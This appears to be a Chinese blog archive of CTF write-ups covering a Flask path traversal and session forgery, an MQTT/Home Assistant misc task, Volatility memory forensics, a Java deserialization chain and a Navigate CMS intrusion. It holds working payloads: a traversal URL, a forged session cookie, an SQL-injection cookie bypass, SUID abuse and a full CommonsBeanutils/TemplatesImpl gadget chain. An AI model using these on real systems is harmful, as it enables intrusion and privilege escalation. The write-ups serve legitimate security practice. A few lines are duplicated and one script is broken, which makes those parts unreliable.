标签 WP 下的文章

web669

  1. 源码分析,该路由可以读文件,双写绕过,获得hosts

    http://eci-2ze4ancva5i0u7z30bd6.cloudeci1.ichunqiu.com:8888/....//....//....//....//....//....//....//....///etc/hosts

  2. 得到key,该key用在加密上。

  3. 利用脚本解析jwt,并且将user改为Administrator,即可绕过权限检测。

    ➜  flask-session-cookie-manager-master python3 flask_session_cookie_manager3.py decode -s "engine-1" -c "eyJ1cGRpciI6InN0YXRpYy91cGxvYWRzLzRiM2NmMWZmYzkyMjRmNGQ4MzBjNWEyOWRiODU0ZDE1IiwidXNlciI6Ikd1ZXN0In0.YwiJAQ.f9ZMqkSoEF5HLqEMXGgo7FXPkSw"
{'updir': 'static/uploads/4b3cf1ffc9224f4d830c5a29db854d15', 'user': 'Guest'}
➜  flask-session-cookie-manager-master python3 flask_session_cookie_manager3.py encode -s "engine-1" -t "{'updir': '.', 'user': 'Administrator'}"
eyJ1cGRpciI6Ii4iLCJ1c2VyIjoiQWRtaW5pc3RyYXRvciJ9.YwiJvw.x5iG_1HwbmQOOp7wB2Dw0WzhASY

  4. 利用updir进行文件覆盖,实现SSTI。


  5. 即可传递a参数,实现命令执行

  6. 找到flag

  7. 查看flag,发现没回显,权限不够

  8. 查找可以执行的命令
    ?a=find / -user root -perm -4000 -print 2>/dev/null

  9. 利用dd获取flag
    ?a=/usr/bin/dd%20if=/flag

前言

其实tips给到docker已经有点明显了,但大爹们可能是拿到flag就不想继续玩了(

具体步骤

  1. 要不要考虑去docker hub上看看Nepctf?

  2. pull下来,启动容器/直接导出镜像后,查看home assistant配置文件,就可以看到信号数据,以及彩蛋填写的地址。

  3. 可是到比赛结束都没人找到彩蛋,现在表单已经关闭,礼物就只能留给yunoon自己啦~

后话

下一次要整点什么活呢~

by Yunoon

前言

题目的灵感是来自于Yunoon这边自己为了方便显示器信号的频繁切换,不想一直摁显示器的切换按钮而来。
正巧家里还有小爱音响pro、智能网关这类,就想着组个智能家居,顺便把这些设备全都接入到一个平台上,目前比较友好的就是home assistant了。

Home Assistant 是一款用于家庭自动化的免费开源软件,旨在成为智能家居设备的中央控制系统,专注于本地控制和隐私。可以使用 Android 和 iOS 配套应用程序通过基于 Web 的用户界面访问它,或者通过支持的虚拟助手(如 Google Assistant、Amazon Alexa 甚至斯坦福大学的“Genie”(以前称为“Almond”))通过语音命令访问它开放虚拟助理实验室 (OVAL.) ----翻译自维基百科

这样可以将这些设备都接入到苹果生态中啦(懒狗、deadline都是核心生产力)。
在搭建好后,就购买了可以控制红外收发的设备(ESP8266+收发模块),以及HDMI切换器(支持红外控制)。

通过将ESP8266刷入激活了红外模块的tasmota系统

TASMOTA是具有快速设置和更新的完全本地控制。
使用 MQTT、Web UI、HTTP 或串行进行控制。
使用计时器、规则或脚本实现自动化。
与家庭自动化解决方案集成。
令人难以置信的可扩展性和灵活性。

通过tasmota的控制台可以接收到HDMI红外遥控的NUC数据,将获取的数据存储下来。

在将tasmota添加至home assistant中,在home assistant的configuration.yaml中编写一个开关模块(将获取到的NUC数据放在请求接口中),该模块将调用mqtt的订阅,实现利用mqtt+tasmota控制HDMI控制器。

并且在home assistant中添加HomeKit就可以将红外开关放人HomeKit中了~

题目描述

Yunoon最近沉迷于homeassistant,但他忘记了显示器切换的红外信号数据了,你能帮帮他么。

tips:因为Yunoon比较懒,所有的配置都是默认的。

一个被docker环境难倒的废人呜呜呜

URL:http://222.187.239.143:10013

直播间URL:https://b23.tv/bn0pPAR

别扫别的端口了,求求惹。

不用爆破密码我直接给:admin/admin

共享环境,请不要更改密码。

考点

弱密码(X)/mqtt订阅通配符/homeassistant/tasmota

出题步骤

  1. 弱密码登录(已经省略啦
  2. 通过查看设备,发现tasmota设备位于局域网中,无法访问。
  3. 可以通过tips了解到,tasmota的mqtt监听默认主题cmnd
  4. 利用在mqtt主题中获取到的cmnd加上通配符,即可监听所有的tasmota的mqtt数据。
  5. 再次点击切换,即可获取到data数据,即flag。

解题步骤

  1. 使用题目描述中的admin/admin进入

  2. 首页就可以发现有显示器切换的按钮。

  3. 但问题的点就是在如何获取到其中的信号(data数据),没有玩过home assistant的小伙伴可能就是一脸懵*,但这里就是一个考察大家如何通过已知的信息进行更多信息收集的能力,比如home assistant是什么,开启的服务。

  4. 进入后,发现开启了3个服务,分别为MQTT、Radio Browser、Tasmota

  5. 这里就可以考虑到题目描述中的默认配置,以及MQTT。

  6. Tasmota的MQTT默认订阅为cmnd/stat/tele

  7. 这里就可以利用MQTT的通配符特性来捕获cmnd下所有的数据,即cmnd/#

  8. 在MQTT的配置页面进行监听,再开启一个页面进入首页,点击屏幕切换,即可获取显示器切换的data。

    点击切换按钮

  9. 即可获取flag

解题步骤2.0

  1. 在原有基础上,可以下载MQTT服务的诊断文件,也可获得flag。

  2. 查看下载文件

后话

这个题目其实不算是漏洞考点(毕竟是Misc),主要就是在看看大家在遇到没有遇到过的环境时的临时应变以及信息收集的能力,塞入的真实环境也是节目效果,是要在拿到彩蛋后才能触发的真结局。

希望下一次的NepCTF能够给各位整点新活,我们下次再见!

关于彩蛋

再读下题目描述,和docker相关。
在这之前做出来都算哟。
后续会在平台关闭后再将彩蛋解题思路上线博客博客链接

Misc

简单取证

  1. 浏览记录查看vol.py -f file.raw --profile=WinXPSP2x86 iehistory

    Process: 1600 explorer.exe
Cache type "URL " at 0x1fb5800
Record length: 0x100
Location: Visited: Administrator@http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
Last modified: 2022-06-20 12:36:39 UTC+0000
Last accessed: 2022-06-20 12:36:39 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xc4
**************************************************
Process: 1600 explorer.exe
Cache type "DEST" at 0x2ab9a55
Last modified: 2022-06-20 21:00:08 UTC+0000
Last accessed: 2022-06-20 13:00:10 UTC+0000
URL: Administrator@file:///C:/Documents%20and%20Settings/Administrator/Lhb/secret.jpg

    获取到敏感文件secret.jpg

  2. 全局搜索secret.jpgvol.py -f file.raw --profile=WinXPSP2x86 filescan | grep secret.jpg

    yunoon@YunoondeMacBook-Air Simple_forensics % vol.py -f file.raw --profile=WinXPSP2x86 filescan | grep secret.jpg
Volatility Foundation Volatility Framework 2.6.1
0x000000000207e3d8      1      0 RW-rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\Recent\secret.jpg (3).lnk
0x0000000002325028      1      0 R--r-- \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\secret.jpg

  3. 提取secret.jpg vol.py -f file.raw --profile=WinXPSP2x86 dumpfiles -Q 0x0000000002325028 --dump-dir=./

  4. 查看发现为base64加密的逆序数据,将其解密,得到一个加密的zip包。
    iShot_2022-07-02_15.58.14

  5. 通过strings file.raw | grep password获取到密码echo password = 62b041223bb9a

  6. 解压后,发现是散点图。

  7. gnuplot绘制即可a

  8. 扫码获取flag:flag{a6b93e36-f097-11ec-a9b2-5254002d2b31}

what_is_log(是一血 好耶!)

strings flag2.scap

challenge
info
info
name
name

challenge
info
+---------+----------------------------------+
| name    | data                             |
+---------+----------------------------------+
| success | 1555a651a13ec074ce725383214fd7cc |
+---------+----------------------------------+
1 row in set (0.00 sec)
/etc/localtime
mysql> 
+---------+----------------------------------+
| name    | data                
/proc/loadavg

flag: PCL{1555a651a13ec074ce725383214fd7cc}7cc}

Web

Ez_Java

  1. 解压后,通过IDEA进行反编译。

  2. 先通过signedobject二次反序列化绕黑名单

  3. 再用/data接口打cb链

    TemplatesImpl obj = new TemplatesImpl();
setFieldValue(obj, "_bytecodes", new byte[][]{
    ClassPool.getDefault().get(calc.class.getName()).toBytecode()
});
setFieldValue(obj, "_name", "HelloTemplatesImpl");
setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
ConstantFactory constantFactory = new ConstantFactory(TrAXFilter.class);
Transformer[] transformers = new Transformer[]{
        new ConstantTransformer(TrAXFilter.class),
        new InstantiateTransformer(
            new Class[] { Templates.class },
            new Object[] { obj })
    };
    Transformer transformerChain = new ChainedTransformer(fakeTransformers);
    Map hashMap = new HashMap();
    Map outerMap = DefaultedMap.decorate(hashMap, transformerChain);
    TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, "key");
    HashMap evalMap = new HashMap();
    evalMap.put(tiedMapEntry, "test");
    outerMap.remove("key");
    Field declaredFields = ChainedTransformer.class.getDeclaredField("iTransformers");
    declaredFields.setAccessible(true);
    declaredFields.set(transformerChain, transformers);
    PrivateKey privateKey = new PrivateKey() {
        @Override
        public String getAlgorithm() {
            return null;
        }
    
        @Override
        public String getFormat() {
            return null;
        }
    
        @Override
        public byte[] getEncoded() {
            return new byte[0];
        }
    };
    Signature signature = new Signature("AES") {
        @Override
        protected void engineInitVerify(PublicKey publicKey) throws InvalidKeyException {
    
        }
    
        @Override
        protected void engineInitSign(PrivateKey privateKey) throws InvalidKeyException {
    
        }
    
        @Override
        protected void engineUpdate(byte b) throws SignatureException {
    
        }
    
        @Override
        protected void engineUpdate(byte[] b, int off, int len) throws SignatureException {
    
        }
    
        @Override
        protected byte[] engineSign() throws SignatureException {
            return new byte[0];
        }
    
        @Override
        protected boolean engineVerify(byte[] sigBytes) throws SignatureException {
            return false;
        }
    
        @Override
        protected void engineSetParameter(String param, Object value) throws InvalidParameterException {
    
        }
    
        @Override
        protected Object engineGetParameter(String param) throws InvalidParameterException {
            return null;
        }
    };
    SignedObject signedObject = new SignedObject(evalMap, privateKey, signature);
        final BeanComparator comparator = new BeanComparator();
        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
        queue.add(1);
        queue.add(1);
        setFieldValue(comparator, "property", "object");
        setFieldValue(queue, "queue", new Object[]{signedObject, signedObject});
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(queue);
        oos.close();

高手高手高高手

  1. 扫出路径login.php

  2. 发现是navigate cms的洞,题目提示有msf,那就直接用msf来试试,发现路径要改为“/”,但依旧上传不成功。

  3. 登录绕过Cookie:navigate-user=\' OR TRUE--%20

  4. 利用发现template处可以文件任意写入
    Snipaste_2022-07-03_08-44-14
    Snipaste_2022-07-03_08-44-20

  5. 就可以用蚁剑连上。
    Snipaste_2022-07-03_08-29-49

  6. 然后再反弹shell,使用同样的方法再上传个polkit提权。
    Snipaste_2022-07-03_08-44-36
    Snipaste_2022-07-03_08-43-22

  7. 发现有个flag文件,但提示需要删掉菠菜内容,二进制查看,发现文件位置。

  8. 去掉写保护后,可以成功删除,并且再次执行拿到flag。
    Snipaste_2022-07-03_08-43-33
    Snipaste_2022-07-03_08-43-43

Web1 签到

源码里的Base64 解密一下
iShot_2022-06-26_10.54.19

Web2 Code_1

  1. 用data://伪协议+base64来获取Welcome!
  2. 然后包含./flag.php即可

payload:?input1=./flag.php&&input2=data://text/plain;base64,V2VsY29tZSE=&&input3=test

Misc1

Misc3 EASYFORENSICS

  1. 解压出来的vmem文件,直接用volatility提取数据。


    1. 过滤flag关键字

    yunoon@YunoondeMacBook-Air Misc3 % vol.py -f CTFWindows7-8f09ab24.vmem --profile=Win7SP1x86_23418 filescan | grep flag    
Volatility Foundation Volatility Framework 2.6.1
0x000000002e8c0880      8      0 RW-r-- \Device\HarddiskVolume2\flag\hint.txt.txt
0x000000002e8f7a58      1      1 R--rw- \Device\HarddiskVolume2\flag
0x000000002e90f038      8      0 RW-r-- \Device\HarddiskVolume2\fffffflag\baidunetdisk.txt
0x000000002e96ac80      2      0 RW-rw- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Recent\fffffflag.lnk
0x000000002f38b038      1      1 R--rw- \Device\HarddiskVolume2\fffffflag
0x000000002f39f038      2      0 RW-rw- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Recent\flag.lnk
0x000000002f3b10d8      2      1 R--rwd \Device\HarddiskVolume2\fffffflag
0x000000002f8a4298      2      1 R--rwd \Device\HarddiskVolume2\fffffflag

    1. 过滤xiaoming和txt关键字
      yunoon@YunoondeMacBook-Air Misc3 % vol.py -f CTFWindows7-8f09ab24.vmem --profile=Win7SP1x86_23418 filescan | grep xiaoming | grep .txt
Volatility Foundation Volatility Framework 2.6.1
0x000000002bf5f110      2      0 -W---- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Cookies\xiaoming@ieonline.microsoft[1].txt
0x000000002e967e48      2      0 -W---- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Cookies\Low\xiaoming@hm.baidu[1].txt
0x000000002e973b40      2      0 RW-rw- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Recent\zippasswd.txt.lnk
0x000000002e9fe628      8      0 RW---- \Device\HarddiskVolume2\Users\xiaoming\Desktop\zippasswd.txt
0x000000002ea9ad90      8      0 -W---- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Cookies\Low\xiaoming@cmd5[1].txt
0x000000002ebc2878      2      0 RW-rw- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Recent\hint.txt.lnk
0x000000002f34f210      8      0 -W---- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Cookies\Low\xiaoming@bing[2].txt
0x000000002f398c98      1      1 -W-rw- \Device\HarddiskVolume2\Users\xiaoming\AppData\Local\Temp\FXSAPIDebugLogFile.txt
0x000000002f7d1480      2      0 RW-rw- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Recent\baidunewdisk.txt.lnk
0x000000002f82bb78      8      0 -W---- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Cookies\Low\xiaoming@msn[2].txt
0x000000002f8c9cb8      8      0 -W---- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Cookies\Low\xiaoming@sojson[1].txt
0x000000002f9c0038      8      0 -W-rw- \Device\HarddiskVolume2\Users\xiaoming\AppData\Local\Microsoft\Internet Explorer\brndlog.txt
0x000000002f9cfaf8      2      0 -W---- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Cookies\Low\xiaoming@cn.bing[2].txt
0x000000002f9f0af0      2      0 -W---- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Cookies\Low\xiaoming@www.bing[1].txt
0x000000002fb0d500      8      0 -W-rwd \Device\HarddiskVolume2\Users\xiaoming\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\5G8FOASY\eb-c31c9a-3cb8f63e[1].txt
0x000000002fb1a588      8      0 -W---- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Cookies\xiaoming@microsoft[1].txt
    2. 提取数据

    yunoon@YunoondeMacBook-Air Misc3 % vol.py -f CTFWindows7-8f09ab24.vmem --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000002e8c0880 --dump-dir=./
Volatility Foundation Volatility Framework 2.6.1
DataSectionObject 0x2e8c0880   None   \Device\HarddiskVolume2\flag\hint.txt.txt

yunoon@YunoondeMacBook-Air Misc3 % vol.py -f CTFWindows7-8f09ab24.vmem --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000002e90f038 --dump-dir=./
Volatility Foundation Volatility Framework 2.6.1
DataSectionObject 0x2e90f038   None   \Device\HarddiskVolume2\fffffflag\baidunetdisk.txt

yunoon@YunoondeMacBook-Air Misc3 % vol.py -f CTFWindows7-8f09ab24.vmem --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000002e9fe628 --dump-dir=./

  2. 提取出来的文件有hint.txt.txt,baidunetdisk.txt,zippasswd.txt

  3. 通过获取到剪贴板的数据fa5ef7676006afd4748becb7e68b0aed,可以提取到网盘提取码。

    yunoon@YunoondeMacBook-Air Misc3 % vol.py -f CTFWindows7-8f09ab24.vmem --profile=Win7SP1x86_23418 clipboard                                    
Volatility Foundation Volatility Framework 2.6.1
Session    WindowStation Format                 Handle Object     Data                                              
---------- ------------- ------------------ ---------- ---------- --------------------------------------------------
         1 WinSta0       0xc009L             0x124034b 0xff5820a8                                                   
         1 WinSta0       CF_TEXT                   0x0 ----------                                                   
         1 WinSta0       CF_UNICODETEXT        0xe0395 0xffb83ee0 fa5ef7676006afd4748becb7e68b0aed                  
         1 WinSta0       0xc013L              0x3101cf 0xff5744f8                                                   
         1 WinSta0       CF_LOCALE            0x49008b 0xfda0d260                                                   
         1 WinSta0       CF_OEMTEXT                0x1 ----------

  4. md5解密后,得到为789C

  5. 下载获得flag.img文件

  6. 将其挂载后得到以下数据

  7. YESYESLookAtme就是我们要找的文件,利用提取到的zippasswd.txt获得其中内容。

  8. zippasswd是hex字符串,可以直接放到16进制编辑器中,发现是PNG文件。

  9. 但头文件有问题,对其进行修复,更改文件后缀为png。

  10. 获取到qrcode

  11. 扫码获取解压码password_is_passwd

  12. 解压得到其中的内容,一共有377个

  13. 这里拿到过后开始以为是三维图,画了半天感觉方向错了,是RGB数据。

  14. 编写脚本,把每个文件渲染成图片。

    from PIL import Image

#图片有1600条RGB数据,因此判断为40x40.
def render(name):
    file1 = open(name)
    im = Image.new("RGB", (40, 40))
    for i in range(40):
        for j in range(40):
            file = file1.readline()
            list1 = file.split(" ")
            im.putpixel((i, j), (int(list1[0]), int(list1[1]), int(list1[2])))

    im.save(f"./pic/{name}.png")


def main():
        # render("1.txt")
        print(f"=========Is Render Img{i}=============")
        render(f"{i}.txt")


if __name__ == '__main__':
    main()

  15. 获取到图片过后,使用magick+gaps来拼接图片。

  16. 377个图片可以推算出只有两种排列方式

    for i in range(376):
    for j in range(377):
        if i*j == 377:
            print(i,j)
        
#output:
#13 29
#29 13

  17. magick安装


    1. 直接参考官网即可下载/安装连接
    2. macOS的

  18. gaps安装


    1. 直接参考GitHub安装文档 项目GitHub连接
    2. 直接查看installation
    3. 可以改requirements.txt,也可以不改,报错改就行。

  19. 使用magick来讲分散的图片进行拼接
    montage *.txt.png -tile 29x13 -geometry +0+0 flag.png
    -tile: 指定长x宽
    -geometry geometry preferred tile and border sizes

    就可以将所有的.txt.png图片拼接成一个29x13的图片

  20. 在使用gaps来进行自动拼图就行,安装完毕后,在bin/目录下执行命令即可。

    python3 gaps --image=flag.png --size=40

    --image: 指定图片
    --size: 指定每一块的图像的大小。

  21. 最终的结果

  22. 所以说为什么Misc1的伪flag,是这里的真flag,胖揍出题人。这里的真flag,胖揍出题人。是这里的真flag,胖揍出题人。

  1. 1
  2. 2
  3. 3
  4. 4